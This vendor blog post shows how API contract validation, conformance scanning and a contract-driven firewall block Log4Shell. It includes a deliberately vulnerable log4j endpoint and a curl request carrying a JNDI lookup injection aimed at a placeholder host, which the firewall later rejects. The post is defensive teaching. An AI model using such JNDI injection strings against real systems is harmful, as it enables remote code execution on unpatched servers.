42CRUNCH BLOG


Protecting your APIs against Log4Shell with 42Crunch


On December 9th, 2021, the log4shell vulnerability hit the news and it has since been every security team’s worst nightmare: trivially exploitable, huge impact with RCE (Remote Code Execution), on a component widely used across traditional enterprise technological stacks, both in in-house and third-party software. All this combined explains its CVSS rating of 10 – the highest possible. It is probably one of the worst flaws I have witnessed in my security career; it gives everything to an attacker for little to no effort. In the last few days, we have seen other vulnerabilities targeting the log4j library.

Understandably, many articles have been written about the log4shell vulnerability and the vulnerabilities that followed, explaining what it does and how it works, or how to detect exploitation attempts.

In this article we take a different approach: we show how a positive security model dramatically reduces your attack surface, effectively hindering and/or blocking such injections, and how a positive security approach can be implemented to secure your APIs from the development phase to the production environments with 42Crunch.

Creating an API contract

Adopting a positive security approach to API design starts with creating an API contract. Think of an API contract as a blueprint of your APIs, a list of formal rules of what your API accepts and how it responds. By definition, in a positive security model, everything not formally allowed by the contract is rejected.

Two approaches can be used to create an API contract:

  • Design first, designing the API contract and then implementing it
  • Code first, developing the API and generating a contract from it

Although we are a bit opinionated and advise a design-first approach because, from a security standpoint, it helps tremendously with threat modeling, 42Crunch integrates identically with both code-first and design-first approaches.

Here, let’s take a simple flawed contract written in OASv3 format:

"/login": {
            "post": {
                "summary": "Login to the endpoint",
                "description": "A username is passed as parameter and logged by log4j",
                "operationId": "logUser",
                "requestBody": {
                    "required": true,
                    "content": {
                        "application/json": {
                            "schema": {
                                "additionalProperties": false,
                                "type": "object",
                                "properties": {
                                    "user": {
                                        "type": "string"
                                    }
                                }
                            }
                        }
                    }
                },
                ...

From a positive security model standpoint, there is a security issue with how the user property is defined.

How is this definition flawed? This API contract excerpt defines a /login endpoint that, for POST requests, accepts a JSON object in its body with a user property of type string. The main issue is that this user property is not constrained in any way by the contract. Its maximum length is not specified, so the user property could be a 100MB string. Also, any character can appear in the user property, e.g. $é!, quotes, emojis, etc.

A 42Crunch security audit of this API contract, run for example in one of our free IDE plugins (Visual Studio Code, IntelliJ, Eclipse), finds the following issues on the user property (excerpt):

  • String schema has no pattern defined
    Possible exploit scenario: If you do not define a pattern for strings, any string is accepted as the input. This could open your backend server to various attacks, such as SQL injection.
  • String schema has no maximum length defined
    Possible exploit scenario: If you do not limit the length of strings, attackers can send longer strings to your API than what your backend server can handle. This could overload your backend server and make it crash. In some cases, this could cause a buffer overflow and allow for executing arbitrary code. Long strings are also more prone to injection attacks.
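
To make these two findings concrete, here is a minimal Java sketch of the kind of check that could flag them on a string schema. It is not how the 42Crunch audit is implemented: the class name StringSchemaCheck, the findIssues method, and the representation of a schema as a Map are assumptions made for illustration. Only the two issue titles come from the report excerpt above.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Map;

// Hypothetical illustration only: not the 42Crunch audit implementation.
class StringSchemaCheck {

    // Returns the findings for one property schema given as a plain map,
    // e.g. {"type": "string"}. Non-string schemas yield no findings here.
    static List<String> findIssues(Map<String, Object> schema) {
        List<String> issues = new ArrayList<>();
        if (!"string".equals(schema.get("type"))) {
            return issues;
        }
        if (!schema.containsKey("pattern")) {
            issues.add("String schema has no pattern defined");
        }
        if (!schema.containsKey("maxLength")) {
            issues.add("String schema has no maximum length defined");
        }
        return issues;
    }

    public static void main(String[] args) {
        // The "user" property exactly as declared in the flawed contract.
        Map<String, Object> user = Map.of("type", "string");
        findIssues(user).forEach(System.out::println);
    }
}
```

Run against the user property of the flawed contract, this sketch reports both issues, because the schema declares a type and nothing else.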

How do these issues manifest themselves in an actual implementation?

Exploiting a badly designed API

To make this issue concrete, let’s develop a simple implementation of this login endpoint that uses log4j 2.14.1, a version vulnerable to log4shell. This endpoint just writes to the logs which user has logged in and returns only {"msg": "OK"} to the client. It looks something like this:

public ResponseEntity<LoggedSchema> logUser(InlineObject inlineObject) {
        LoggedSchema response = new LoggedSchema();
        logger.info("User {} logged in", inlineObject.getUser());
        response.msg("OK");
        return new ResponseEntity<>(response, HttpStatus.OK);
    }

Let’s try a simple call to this endpoint:

$ curl -XPOST http://localhost:8080/login -H 'Content-type: application/json' -d'{"user": "xliic"}'
{"msg":"OK"}

In the running API the following log pops up:

2021-12-20 11:36:26.154  INFO 527382 --- [nio-8080-exec-2] c.x.l.LoginApiImpl : User xliic logged in

Now, instead of this xliic string, let’s try an injection. As this application uses a vulnerable version of log4j, an attacker could try injecting a JNDI lookup string into the user property, as in a log4shell exploit:

$ curl -XPOST http://localhost:8080/login -H 'Content-type: application/json' -d'{"user": "${jndi:ldap://willnotwork/xliic}"}'
{"msg":"OK"}

The application logs display the following error, showing that the vulnerability was triggered but failed because the API could not resolve the non-existing willnotwork host to retrieve the resource:

2021-12-20 11:37:20.879  INFO 527382 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 1 ms
2021-12-20 11:37:20,952 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://willnotwork/xliic]. javax.naming.CommunicationException: willnotwork:389 [Root exception is java.net.UnknownHostException: willnotwork]
	at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:252)
	at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
	at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1616)
	at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2847)
	at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:348)
...

Improving the API contract and the security posture

We need to understand what happened — we are dealing with multiple critical security issues here:

  1. A vulnerable version of log4j
  2. Improper data definition and validation that enables injection (cf. OWASP API8:2019)

Because of the improper data validation, exploiting the log4j vulnerability is trivial. An organization’s attack surface expands with every input or output that is not formally constrained and validated. No amount of exploit detection will ever fill that security hole.

But how can this parameter be constrained?

The problem organizations face is that when security teams want to address this question, they often don’t know what a specific API is supposed to do or accept. Consequently, they lack the knowledge to enforce an effective security policy on these components beyond using attack detection tools (tools to identify bad actors, tools to identify traffic that “looks” suspicious, etc.). And in the rare cases where they do have this knowledge, they have to implement these security policies manually and update them as the API changes.

In an organization, developers have this knowledge. Improving the security posture is a matter of implementing a virtuous feedback loop between the development and security team, sharing this knowledge in a structured format to enable security automation.

In our example, the 42Crunch audit report gives remediation guidelines for the API contract. Following these guidelines, the API developer specifies the business constraints (pattern and maxLength) on the user property:

    "properties": {
        "user": {
            "type": "string",
            "pattern": "^[a-zA-Z][a-zA-Z0-9]*$",
            "maxLength": 64
        }
    }

The pattern limits the user property to strings that start with a lowercase or uppercase letter and continue with any number of letters or digits. Examples of valid strings are "abc123" and "Hworld1". However, "0hey" is not allowed because the value cannot start with a digit, and neither is "a$bc", as the "$" character is not allowed anywhere in the string. Also, the user property is constrained to a maximum of 64 characters.
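
To see these two constraints at work, the short Java sketch below applies the same pattern and maximum length to a few candidate values, including the JNDI lookup string used earlier. The class name UserConstraint and the isValid helper are hypothetical names chosen for this illustration; only the regular expression and the limit of 64 come from the contract.

```java
import java.util.regex.Pattern;

// Illustrative sketch: applies the contract's two constraints to a candidate value.
class UserConstraint {

    // Same expression as the "pattern" keyword in the contract.
    static final Pattern USER_PATTERN = Pattern.compile("^[a-zA-Z][a-zA-Z0-9]*$");
    // Same value as the "maxLength" keyword in the contract.
    static final int MAX_LENGTH = 64;

    static boolean isValid(String user) {
        if (user == null) {
            return false;
        }
        // maxLength counts characters, so count code points rather than UTF-16 units.
        int length = user.codePointCount(0, user.length());
        return length <= MAX_LENGTH && USER_PATTERN.matcher(user).matches();
    }

    public static void main(String[] args) {
        String[] samples = {
            "abc123", "Hworld1", "0hey", "a$bc", "${jndi:ldap://willnotwork/xliic}"
        };
        for (String sample : samples) {
            System.out.println(sample + " -> " + (isValid(sample) ? "accepted" : "rejected"));
        }
    }
}
```

The lookup string is rejected without any knowledge of log4shell: it starts with "$" and contains "{", ":" and "/", none of which the pattern allows.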

In practice, by specifying these limitations, we have made a formal definition of the parameters allowed by our API that we can then leverage. The API audit score of our API is now 100/100.

Validating the implementation by ensuring conformance

Whatever the API contract states, it is of limited value if the implementation differs. One crucial step in adopting a positive security approach is ensuring that every formal definition is properly implemented. At 42Crunch, the Conformance scanner does just that: it validates whether the API properly implements the limitations and constraints of the API Contract.

Let’s run the conformance scan on this new contract while keeping the implementation vulnerable:

$ docker run -e SCAN_TOKEN=***** 42crunch/scand-agent:latest
scand 1.14.1-release:v1.14.1 : 83c525177f3a9b70ef54d05f11139cba1f275f72-N :Mon Dec 20 11:21:02 2021 user@10c96cc2c988
{"level":"error","time":"2021-12-20T11:21:04.75510816Z","message":"scan terminated with state [1] : done"}

In the logs we can find some of the tests run by the scanner:

...
2021-12-20 12:21:04.701  INFO 531009 --- [nio-8080-exec-9] c.x.l.LoginApiImpl                       : User Qz~A-C-8-~-shNM~2SytwFULX.cIW7T_ logged in
2021-12-20 12:21:04.739  INFO 531009 --- [io-8080-exec-10] c.x.l.LoginApiImpl                       : User goilA0U1WxNeW1gdgUVDsEWJ77aX7tLFJ84qYU6UrN8ctecwZt5S4zjhD0tXRTmkY logged in

In the Conformance scan report, we see that 15 security and conformance issues are found. Two of the listed issues are:

  • Test: The generated value does not follow the property pattern for strings [FAILURE]
    In this test, the scanner generated a user property that does not match the pattern allowed. The API did not reject the request, indicating that pattern constraints on this parameter are not implemented.
  • Test: The generated value does not follow the property maxLength for strings [FAILURE]
    In this test, the scanner generated a user property that does not match the maximum length defined. The API did not reject the request, indicating maximum length constraints on this parameter are not implemented.

Here the Conformance scan allowed us to identify that the API does not enforce the API contract constraints. Because of that, the API is vulnerable to multiple injections such as the log4shell vulnerability.
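
The idea behind these two tests can be sketched in a few lines of Java. This is a simplified illustration and not the 42Crunch scanner: the endpoint is modeled as a function from the user value to an HTTP status code, the class name ConformanceSketch and the run method are hypothetical, and treating any 4xx status as a rejection is an assumption of this sketch. The first invalid value is the one visible in the logs above.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.ToIntFunction;

// Hypothetical sketch of a conformance check: not the 42Crunch scanner.
class ConformanceSketch {

    // Sends deliberately invalid "user" values to the endpoint and records,
    // per constraint, whether the value was rejected (assumed here: any 4xx).
    static Map<String, Boolean> run(ToIntFunction<String> endpoint) {
        Map<String, String> invalidInputs = new LinkedHashMap<>();
        // Contains characters outside [a-zA-Z0-9], so it violates the pattern.
        invalidInputs.put("pattern", "Qz~A-C-8-~-shNM~2SytwFULX.cIW7T_");
        // One character longer than the maxLength of 64.
        invalidInputs.put("maxLength", "a".repeat(65));

        Map<String, Boolean> rejected = new LinkedHashMap<>();
        invalidInputs.forEach((constraint, value) -> {
            int status = endpoint.applyAsInt(value);
            rejected.put(constraint, status >= 400 && status < 500);
        });
        return rejected;
    }

    public static void main(String[] args) {
        // Stand-in for the vulnerable implementation: it accepts every value.
        ToIntFunction<String> vulnerable = user -> 200;
        run(vulnerable).forEach((constraint, ok) ->
                System.out.println(constraint + ": " + (ok ? "PASS" : "FAILURE")));
    }
}
```

An implementation that answers 200 to everything fails both checks, which mirrors the two FAILURE results listed above.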

We already saw that the audit plugin is available to developers inside their IDEs. API audits and Conformance scans can also be integrated through native plugins into CI/CD pipelines, so that security teams can enforce security gates in the build process and keep such issues from reaching production.

Enforcing the contract to protect the API

Now, imagine this vulnerable implementation is running in production. How can this API be protected with this positive security approach while the implementation is being fixed to conform to the secured contract? A gap in patching is a major issue for organizations.

To address this, 42Crunch developed a very low latency API firewall that configures itself automatically from an API contract. This firewall only forwards traffic that conforms to the contract, in both directions (requests to the API server and responses to the API client), enforcing the positive security model. The firewall also supports security policies (rate limiting, JWT token validation, etc.) that can be injected into the contract to enable security-as-code.

Besides the low latency of our API firewall, one major difference from a traditional WAF approach is this formal definition through an API contract. By looking at a request and a contract, a security engineer can know without any doubt whether the request will be blocked. If the contract explicitly allows it, it is allowed; if not, it is denied. There is no grey area, no guesswork, and no false positives or false negatives, by definition.
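
This allow-or-deny decision can be written down as a small deterministic function. The Java sketch below is an illustration of the principle for the /login request body only, not the firewall's implementation: the class name LoginContract and the allows method are hypothetical, and the parsed JSON body is assumed to be available as a Map.

```java
import java.util.Map;
import java.util.Set;
import java.util.regex.Pattern;

// Hypothetical sketch of contract enforcement: not the 42Crunch firewall.
class LoginContract {

    // "additionalProperties": false means only declared properties may appear.
    static final Set<String> ALLOWED_PROPERTIES = Set.of("user");
    static final Pattern USER_PATTERN = Pattern.compile("^[a-zA-Z][a-zA-Z0-9]*$");
    static final int USER_MAX_LENGTH = 64;

    // Returns true only when the body satisfies every rule of the contract;
    // anything the contract does not explicitly allow is denied.
    static boolean allows(Map<String, Object> body) {
        if (!ALLOWED_PROPERTIES.containsAll(body.keySet())) {
            return false; // a property the contract does not define
        }
        if (!body.containsKey("user")) {
            return true; // the contract excerpt does not mark "user" as required
        }
        Object value = body.get("user");
        if (!(value instanceof String)) {
            return false; // "type": "string"
        }
        String user = (String) value;
        return user.codePointCount(0, user.length()) <= USER_MAX_LENGTH
                && USER_PATTERN.matcher(user).matches();
    }

    public static void main(String[] args) {
        System.out.println(allows(Map.of("user", "xliic")));
        System.out.println(allows(Map.of("user", "${jndi:ldap://willnotwork/xliic}")));
        System.out.println(allows(Map.of("user", "xliic", "role", "admin")));
    }
}
```

The function has no notion of what an attack looks like. It only knows what the contract allows, which is why the outcome for a given request can be predicted by reading the contract.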

Let’s run the same requests through the API firewall:

$ curl -XPOST http://localhost:8080/login -H 'Content-type: application/json' -d'{"user": "xliic"}'
{"msg":"OK"}

This request goes through without any issue, as the user property conforms to the API contract.

$ curl -XPOST http://localhost:8080/login -H 'Content-type: application/json' -d'{"user": "${jndi:ldap://willnotwork/xliic}"}'
{
    "status": 403,
    "title": "request validation",
    "detail": "Forbidden",
    "uuid": "f8a9cb12-8be9-4dc1-9e3d-738008b91f1a"
}

Here, the request is blocked by the API firewall as it does not conform to the API contract. The attempted injection in the user property does not match the pattern constraint and is rightfully blocked by the API firewall. The API still has a vulnerability: both the log4j dependency and the data validation should be patched. But by adopting a positive security model and enforcing it, the attack surface has effectively shrunk and the API is protected.

Conclusion

The key takeaways are:

  • Security must be implemented all across the SDLC — shift left and shield right
  • Shrinking the attack surface of APIs starts with data validation
  • Data validation should be implemented through a formal positive security model
  • Positive security models avoid security guesswork and enable security automation

Stages of positive security model implementation:

  • Define API inputs and outputs in an API contract
  • Verify conformance of API implementation against the API contract
  • Enforce the API contract at runtime